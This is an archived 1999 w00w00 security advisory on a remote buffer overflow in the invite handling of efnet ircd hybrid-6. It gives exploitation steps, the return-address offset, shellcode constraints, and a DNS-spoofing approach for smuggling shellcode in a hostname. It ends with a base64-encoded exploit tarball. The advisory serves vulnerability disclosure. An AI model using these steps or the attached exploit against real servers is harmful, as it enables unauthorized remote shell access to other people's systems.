This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --717427360-938467936-934527718=:12840 Content-Type: TEXT/PLAIN; charset=US-ASCII [http://www.w00w00.org, comments to shokat_private] SUMMARY efnet ircd hybrid-6 (up to beta 58) have a vulnerability that can allow remote access to the irc server. In most cases, you'll gain privileges of the 'irc' user. COMMENTS This vulnerability was discovered by jduck and stranjer of w00w00 at least 2 months ago. After discussing the vulnerability, it was reported to Dianora by jduck and fixed. Hopefully the vulnerable irc servers have been fixed. If not, it's unfortunate Dianora didn't notify the vulnerable irc servers or they didn't take these 2 months to fix themselves (note: we didn't wait that long on purpose.. we were just sidetracked with a million other things). DESCRIPTION The vulnerability is in the invite handling code (m_invite). In a channels with operators (ops) and modes +pi (paranoid + invite-only), a channel invitation is reported to all other operators. The buffer used to store the invitation notice can overflow its boundaries by up to 15 bytes. Steps: 1. Client 1 (9chars!10chars@trivial) joins #199chars 2. Client 2 (trivial!trivial@trivial) joins #199chars 3. Client 1 sets mode #199chars +pio Client 2 4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars Note: client 1 and client 3 should _not_ be from the same host. With our exploit, client 3 (compile/run hostname.c) first, then compile/run ircdexp.c. Client #1's server = vulnerable irc server (such as irc.arpa.com) Client #2's server = trivial Client #3's server = ComStud irc server (such as irc.prison.net), because it allows shellcode chars in hostname Using the following spoofed host (59 chars): shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA [The ComStud ircd will check for a '.'] Here, EIP = 0x41414141 (AAAA). The other registers are negligable. The hostlen is actually 63 bytes, but for this specific overflow, EIP is overwritten at buf[54-58]. We have to take stdout/stdin descriptors into consideration. We are very limited in size (only have 54 bytes for shellcode), so we can't fit bind shellcode. Instead, we took the standard Linux x86 shellcode, dropped exit handling code, added a close'd stdin, dup'd cptr->fd (cptr is the first argument passed to m_invite). Since we only have 54 bytes to work with, we can't fit code in to close stdout and dup cptr->fd, so output will be sent to whatever terminald ircd was started from. If you do not wish for the output to be seen, redirect everything (via '>') /dev/null. As for how to go about spoofing, you have options: 1) Use the old DNS poison caching method 2) Use custom "fake binds" that will just pass on your shellcode as a hostname in response to a DNS query (idea from nyt). Option #2 is the approach we will take (hostname.c generates the shellcode we'll use). This will work fine as long as you IP/hostname hasn't already been cached. Because these "fake binds" are pretty popular (or have been in the past), they should be easy to come by and are outside the scope of this advisory. So full steps are, client with the spoofed hostname, connect to a ComStud ircd server (such as irc.prison.net), another client join the arbitrary client, and another client join the target ircd hybrid-6 server (such as irc.arpa.com). Once the channel is +pi (and your channel, ident, username, etc. all the right length), invite the client with the spoofed hostname. Fine-tune until you have root. Thanks to: stranjer and jduck for their input and discovery of this vulnerability. People that deserve hellos: Mike (mikeat_private), vacuum (vacuumat_private), awr (andrewrat_private), dmess0r (dmessorat_private). -- Matt Conover (Shok) & w00w00 Security Team --717427360-938467936-934527718=:12840 Content-Type: APPLICATION/octet-stream; name="ircdexp.tgz" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.3.95.990813110158.12840Bat_private> Content-Description: ircd hyb6 exploit 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 Y4tgAFAAAA== --717427360-938467936-934527718=:12840--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:56:11 PDT